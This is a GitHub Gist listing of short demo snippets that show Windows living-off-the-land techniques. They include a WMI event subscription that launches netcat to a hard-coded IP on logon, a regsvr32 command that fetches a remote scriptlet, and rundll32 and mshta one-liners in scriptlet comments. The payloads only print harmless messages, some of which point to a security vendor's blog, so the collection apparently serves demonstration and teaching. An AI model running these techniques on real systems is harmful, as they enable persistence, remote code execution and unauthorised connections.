Skip to content

Instantly share code, notes, and snippets.

View agreenjay's full-sized avatar

agreenjay agreenjay

4 followers · 1 following
View GitHub Profile
@agreenjay
agreenjay / register3.txt
Created October 25, 2019 21:52
powershell -noexit -noprofile -C {Register-WMIEvent -Query "Select TargetInstance From __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'win32_LogOnSession' AND TargetInstance.LogonType=3" -Action {$names=gwmi Win32_Process;$users=@(); foreach ($n in $names){ $users += $n.GetOwner().User};foreach ($user in $users){if ($user -eq 'cruella') { C:\Users\lex\Documents\nc.exe 172.31.18.92 10000 }}}}
@agreenjay
agreenjay / register2.txt
Created October 25, 2019 20:52
Register-WMIEvent -Query "Select TargetInstance From __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'win32_LogOnSession' AND TargetInstance.LogonType=3" -Action {$names=gwmi Win32_Process;$users=@(); foreach ($n in $names){ $users += $n.GetOwner().User};foreach ($user in $users){if ($user -eq 'cruella') { C:\Users\lex\Documents\nc.exe 172.31.18.92 10000 }}}
@agreenjay
agreenjay / register.txt
Last active October 25, 2019 20:51
Register-WMIEvent -Query "Select TargetInstance From __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'win32_LogOnSession' AND TargetInstance.LogonType=3" -Action {$names=gwmi Win32_Process;$users=@(); foreach ($n in $names){ $users += $n.GetOwner().User};foreach ($user in $users){if ($user -eq 'cruella') { C:\Users\lex\Documents\nc.exe 172.31.18.92 10000 }}}
@agreenjay
agreenjay / sneaky.txt
Last active July 10, 2019 16:40
regsvr32 /s /n /u /i:https://gist.githubusercontent.com/agreenjay/c6cc5066b453b909f5ae0542504c1b6e/raw/c58b9f4fe3ac5251630a2948222cd8909e6ce1dc/scripty2.sct
@agreenjay
agreenjay / stealth3.sct
Last active July 17, 2018 22:59
<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[
window.alert("hello");
@agreenjay
agreenjay / stealth2.sct
Last active July 18, 2018 19:00
<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("powershell -noe write-host Booo!");
@agreenjay
agreenjay / stealth.sct
Last active July 9, 2018 18:54
<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("powershell -noe -nop write-host");
@agreenjay
agreenjay / scripty2.sct
Last active July 10, 2019 16:31
<?XML version="1.0"?>
<scriptlet>
<registration
progid="TESTING"
classid="{A1112221-0000-0000-3000-000DA00DABFC}" >
<script language="JScript">
<![CDATA[
var foo = new ActiveXObject("WScript.Shell").Run("echo If you see this message, you need to review your security. See blog.varonis.com for answers");
]]>
</script>
@agreenjay
agreenjay / boo2.txt
Last active June 15, 2022 16:26
write-host "If you see this message, you have lots of security mitigation work ahead of you!"
@agreenjay
agreenjay / boo1.txt
Last active June 22, 2018 12:31
write-host "Watching GIF animations showing JavaScript malware launched from an ADS"
start-sleep -seconds 4
write-host "can be strangely compelling."
start-sleep -seconds 4
write-host "You'll want to watch this video over and over "
start-sleep -seconds 5
write-host "and over. And now you have an uncontrollabe urge to click the CTA."
start-sleep -seconds 3
write-host "The one that says Free Varonis Demo!"